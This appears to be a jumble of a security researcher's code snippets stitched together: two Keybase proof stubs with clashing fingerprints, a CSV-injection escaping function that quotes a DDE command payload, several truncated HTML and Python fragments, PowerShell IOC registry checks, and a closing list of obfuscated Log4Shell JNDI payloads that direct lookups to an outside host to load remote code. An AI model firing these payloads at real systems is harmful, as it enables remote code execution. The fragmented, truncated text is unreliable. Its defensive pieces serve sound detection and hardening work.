I hereby claim:
- I am ZephrFish on github.
- I am zephrfish (https://keybase.io/zephrfish) on keybase.
- I have a public key whose fingerprint is FADA 204E 6BAE 1870 E42F D105 0DD0 B1CC 7DF5 ADC0
To claim this, I am signing this object:
### Keybase proof
I hereby claim:
* I am ZephrFish on github.
* I am zephrfish (https://keybase.io/zephrfish) on keybase.
* I have a public key whose fingerprint is EC67 4DC5 F2F0 87E5 598B B920 ED66 4E92 D071 41CA

To claim this, I am signing this object:
```python
def escape_csv(payload):
    # Neutralise spreadsheet formula triggers (CSV injection) by prefixing
    # a single quote so the cell is treated as text.
    if payload and payload[0] in ('@', '+', '-', '=', '|'):
        payload = "'" + payload
    # Escape pipes, which DDE-style payloads use to invoke commands.
    payload = payload.replace("|", "\\|")
    return payload


# Example
payload = "@cmd|' /C calc'!A0"
print("The Unescaped version is: " + payload)
print("When passed through escape function the value is: " + escape_csv(payload))
```
```html
<html>
<head>
<link rel="stylesheet" type="text/css" href="css/bootstrap.min.css">
<link rel="stylesheet" type="text/css" href="css/custom.css">
<link rel="stylesheet" href="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.0/jquery.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js"></script>
<title>Application Loader ZSEC-Net</title>
<style>
.ad-left {
```
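```python
# Dir Checker
# Prints out URLs and Paths together
import itertools
import sys


def dirprint(urls, paths):
    # Read both files, skipping blank lines so no empty URL/path pairs are printed
    with open(urls) as url_file, open(paths) as path_file:
        x = [line for line in url_file.read().splitlines() if line]
        y = [line for line in path_file.read().splitlines() if line]
    # Print every URL combined with every path
    for a, b in itertools.product(x, y):
        print("{}/{}".format(a, b))
```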
```python
import requests
import sys
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def quickWin(url, paths):
    with open(paths, 'r') as f:
        for path in f.read().splitlines():
```
// Solarwinds Orion Hashes of Known Malicious IoCs
```powershell
# Checks the registry for IOCs from https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/
# If the IOCs are not present, each query should return "ERROR: The system was unable to find the specified registry key or value."
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\KernelConfig"
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\DriverConfig"
reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SSL Update"

# Checks the paths of IOCs from https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/
# If the IOCs are not present, each will return False
Test-Path C:\Windows\System32\Nwsapagent.sys
Test-Path C:\Windows\System32\helpsvc.sys
```
```text
${jndi:ldap://127.0.0.1:1389/ badClassName}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${::-j}ndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${jndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}
${${lower:jndi}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:${lower:jndi}}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${upper:jndi}:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${upper:j}${upper:n}${lower:d}i:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
```